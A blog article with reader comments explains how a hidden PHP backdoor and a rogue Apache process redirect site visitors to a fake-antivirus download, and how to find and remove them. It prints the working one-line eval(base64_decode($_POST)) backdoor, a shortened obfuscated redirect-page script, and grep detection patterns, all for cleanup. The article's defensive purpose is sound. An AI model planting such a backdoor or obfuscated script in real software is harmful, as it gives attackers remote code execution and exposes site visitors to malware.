
JS:Redirect Trojan on Webserver (keygenguru) (EN)

~4 min. read

This article can also be read in German here.

There is a particular trojan circulating on the web that affects webservers. The server itself carries no virus and has nothing installed that obviously causes the problem. No antivirus solution can find it, yet a redirect to a website serving viruses occurs.

The web pages work completely as they should, but sometimes users are redirected to this site. The content of the web page itself contains no malicious code.

Therefore the problem cannot easily be found. On the redirect target, the user sees a hoax in the form of a Flash-based video and various messages about infections on the local client.

At the end, the user gets a popup saying he must download a Setup.exe to clean his PC. That file contains a trojan and further viruses.
As long as this file is not downloaded, there is NO infection on the local client. Users who have downloaded and installed that file should run an antivirus check.

The problem occurs only in Internet Explorer. Other browsers like Safari and Firefox ignore this redirect and show an empty white page.

It seems that the trojan on the master webserver affects all domains on that server, and it does not redirect every time, only occasionally.
In the end, the cause and the solution are very simple, but finding the trojan is very complex without any information on where to search.

No antivirus scanner will find the trojan, and the reason for that is again very simple (more on this later).

The Apache2 server runs with child processes that handle the load on the server. Normally Apache2 spawns about 20 children on its own and gives each child the same amount of work.
That is the normal way Apache works.

The trojan arrives in a PHP file that is uploaded to the webserver via FTP (usually with a hacked account). Afterwards, a special command sent through this PHP file creates a file called apache2 in the /tmp directory. This file is started under the same user/group as the Apache service.

After it has been started, the file is deleted so that nobody can find it, but the process keeps running in memory. Anyone looking at the process list sees only a number of "./apache2" processes. Which one is a genuine child and which one is the trojan is not visible.

If a user connects to a genuine Apache process, he sees the web page; if a user lands on the "trojan" child, he is forwarded to a site like this one (shortened):

206f
<!-- The cookie name decodes to n_sess_id; "\x3b ex\x70\151\x72es=" is "; expires=" -->
<script type="text/javascript" language="javascript"> var jodmtbm=new Date( ); jodmtbm.setTime(jodmtbm.getTime( )+12*60*60*1000); document.cookie="\x6e_s\x65ss_i\x64=bf4edc3aa95c\x3285\x619a315669\x6333e25ed"+"; path=/\x3b ex\x70\151\x72es="+jodmtbm.toGMTString( ); </script>
<!-- The character codes spell out <div style='display:none'> (59+1 = 60 = '<') -->
<script>document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script>

The complete code can be found here: link to the TXT file, or the older version virustext2.

This code forwards the user to another site.

If Google detects this malware code, the page is blacklisted and users see a screen like this one:


Cleaning:

To clean the trojan from the server, first stop all Apache2 processes with the following command:

/etc/init.d/apache2 stop

With this script you can search for the trojan in all PHP files (download link). Change the corresponding search mask in the script if necessary (if you need help, please contact me):

PAYLOAD='_POST\["p"\]'
#PAYLOAD='eval *\( *base64_decode' # Most evil is behind this snippet. BUT! WordPress also produces this code!
#PAYLOAD="e[^a-z]*v[^a-z]*a[^a-z]*l[^a-z]*b[^a-z]*a[^a-z]*s[^a-z]*e[^a-z]*6[^a-z]*4[^a-z]*_[^a-z]*d[^a-z]*e[^a-z]*c[^a-z]*o[^a-z]*d[^a-z]*e"

On my webserver, the first snippet worked best: no false hits.

The infected files look like this one (there are many different variants): remove_image.php.txt. Usually the trojan attaches itself to the files of some open source project, which serves as a distraction. Normally the malicious code sits on the first line, pushed far to the right of the visible text by a long run of spaces. If you scroll to the right, you find this small piece of code:

if(isset($_POST['p']) && $_POST['p']=='dbcf842538df03b0d3a6f94a11480b1b'){eval(base64_decode($_POST['c']));exit;}

With this code, the attacker can send any code to your webserver via the two variables "p" and "c", and can resend the complete virus code any time he wants.
The virus code itself is stored nowhere on your server, so nothing can be found. The code exists for only a few milliseconds in the /tmp directory.

Usually this file is complete junk and can be deleted, including the open source part. One small string in one file infects your whole webserver!!

If you have no luck with the above solution, you can try to find the attacker via the Apache logfiles. The entries are very easy to identify:

112.121.1.37 - - [09/Feb/2010:06:34:33 +0100] "POST /acp/database/lang/remove_message.php HTTP/1.1" 200 32 "http://www.google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)"

Every request that reaches the infected file has "Alexa Toolbar" in its user agent. That is the same every time. How stupid?? A quick search over your logfile, cleaning the corresponding files, and your webserver is clean again.

My search script (for Confixx):

for x in /var/www/web[0-9]*; do   # one Confixx customer per web<N> directory
  echo "Suche in $x"
  grep "Alexa Toolbar" "$x/log/access_log"
done

Once the files are deleted, the JS:Redirect is history and the server is clean again.
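A structured version of the log search above, written as an added example (not the article's Confixx script): it parses Apache combined-format lines, keeps those with the "Alexa Toolbar" marker, and tallies which files received that traffic (the ones to inspect) and which addresses sent it. The log lines are constructed with documentation IP ranges, modelled on the entry quoted in the article.

```python
"""Triage an Apache combined-format access log for requests carrying the
"Alexa Toolbar" marker. Added example; SAMPLE_LOG below is constructed."""
import re
from collections import Counter

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
MARKER = "Alexa Toolbar"   # the user-agent tell-tale quoted in the article

def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_marker_hits(lines):
    """Yield parsed entries whose User-Agent contains the marker. The backdoor is
    driven by POST (the code arrives in $_POST), so POSTs are the strongest signal."""
    for line in lines:
        rec = parse_line(line)
        if rec and MARKER in rec["ua"]:
            yield rec

def summarize(lines):
    """Return (files, sources): per-file and per-client counts of marker hits.
    The files are the ones to open and search for the eval(base64_decode) snippet."""
    files, sources = Counter(), Counter()
    for rec in find_marker_hits(lines):
        files[rec["path"].split("?", 1)[0]] += 1
        sources[rec["ip"]] += 1
    return files, sources

# Constructed sample (documentation IP ranges): one normal visitor, two backdoor
# POSTs from the same address, and one GET probe with the same user agent.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Feb/2010:06:30:01 +0100] "GET /index.php HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0 (Windows NT 6.1; rv:3.6) Gecko/20100101 Firefox/3.6"',
    '198.51.100.7 - - [09/Feb/2010:06:34:33 +0100] "POST /acp/database/lang/remove_message.php HTTP/1.1" 200 32 '
    '"http://www.google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)"',
    '198.51.100.7 - - [09/Feb/2010:07:12:45 +0100] "POST /gallery/remove_image.php HTTP/1.1" 200 32 '
    '"http://www.google.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)"',
    '203.0.113.5 - - [09/Feb/2010:07:13:02 +0100] "GET /gallery/remove_image.php?x=1 HTTP/1.1" 200 410 '
    '"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toolbar)"',
]

if __name__ == "__main__":
    files, sources = summarize(SAMPLE_LOG)
    for path, n in files.most_common():
        print(f"{n:4d}  {path}")
    print("sources:", dict(sources))
```

On a real server, feed it `open("/var/www/web1/log/access_log")` instead of SAMPLE_LOG.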


If you need help or have questions, please do not hesitate to contact me.

About Stefan

A male IT nerd who scours the web for special gadgets, indispensable software and everything in the IT sector that must not be missed. Always ready to help when problems need solving or the impossible is to be achieved.


4 comments

  1.

    Hi Stefan,

    Thanks a lot for your article. My website is infected by this very same Trojan. I'm not very 'server-savvy' but I have informed my provider and hope he'll be able to solve this issue asap!

    Anyway, in the meanwhile, I have two questions I was hoping you're able to answer:
    1) How can a server get infected by this Trojan? I guess it's caused by an infected computer making an FTP connection to the server?? If so, this brings me to the second question:
    2) Once the trojan is removed from the server, how can I be sure I won't reinfect my server once I use my FTP program again? In other words, how do I make sure my personal computer is 'free' from this Trojan? As stated in your article, virus scanners aren't able to spot this trojan?

    Thanks a lot in advance for your additional insights!

  2.

    1) Yes, normally the attacker uploads this PHP file with FTP to the webserver and starts it.
    2) If you have found the trojan on the webserver, you have several ways to find out how this trojan got onto your server.

    One way is to study the logfiles on your server, which is the best way. If you have found the file on the server, DON'T delete it; look first at the date/time when it was created, then delete it. After that, go to your FTP/SSH logfile on the server and look which user uploaded that file at this date/time.
    Change the password of this FTP/SSH account and you should be safe again.

    This code on your server is not a trojan as such; usually it is hidden code that allows injecting another trojan. Therefore it will not be found.

    This is then only a redirect trojan, which sends the user to a website containing a virus. This virus can be found with client scanners! So, if your client is infected, you can clean it with Norton, McAfee, Avira or any other program.

    Is it your root or virtual server, or are you on a shared system (only webhosting)?

    If you have only webhosting, then it can be that another customer has this trojan and therefore the whole server has the problem, without any infection on your own website. If it's your root or virtual server, you can normally find the trojan easily in the logs as described in the article.

    If you have any questions or need help, write me.

  3.

    @Stefan

    Hi Stefan, first of all, thanks a lot for your (enormously swift) reply! I won't bother you with all that happened last week, but I'll summarize my current situation and hope you can advise me on how to act next:

    I am in the process of moving all my domains to a new hosting provider, and I have offline copies (on my computer) of all my websites. So, when I have moved my domains to my new hosting provider, I am planning to just upload my (offline) copies onto the new server.

    However, how do I make 100% sure that these 'offline copies of my websites' (on my computer) are not infected in any way by the Trojan you describe in your article?

    I just called my 'old' hosting provider, and he argued that the problem is in some script on my website, and as such, that moving my website to a new hosting provider won't solve anything. Help? (ps. my MSN is: —MSN address removed by Admin—)
